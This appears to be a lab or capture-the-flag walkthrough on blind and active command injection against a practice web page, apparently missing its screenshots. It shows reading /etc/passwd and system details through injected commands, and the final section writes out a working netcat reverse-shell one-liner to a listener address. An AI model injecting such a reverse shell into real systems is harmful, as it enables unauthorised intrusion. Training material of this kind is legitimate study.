Injection

An introduction to Command Injection

Blind Command Injection


Lets go to the webpage


Lets try to find the Kernel Version and redirect it to a file and then read the file



Now lets enter root and look at the response for the answer to the next question


Now lets enter www-data


Lets enter our name and see what the output is


Active Command Injection


Lets go to the webpage that they mention

Lets look at the files and see if there is an interesting file with the ls command

There is an interesting file

To see how many users are there on the machine, we can read the /etc/passwd file

We can look at this output by going to the source code


We can see which user the app is running as with the whoami command


We can see what this user's shell is set as in the /etc/passwd file


We can see what version of Ubuntu is running by using the command lsb_release -a


We can print out the MOTD with this command


Get the Flag!
Lets first get a reverse shell on the machine so that we can navigate through the machine easier.
First we start a netcat listener

Now we use the reverse shell command
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f

Lets hit Submit

We have a shell, lets stabilize it

Lets now look for the flag, it might be a txt file and maybe called flag, so lets look for that
find / -type f -name flag.txt 2>/dev/null

We have the flag, lets read it

Last updated
Was this helpful?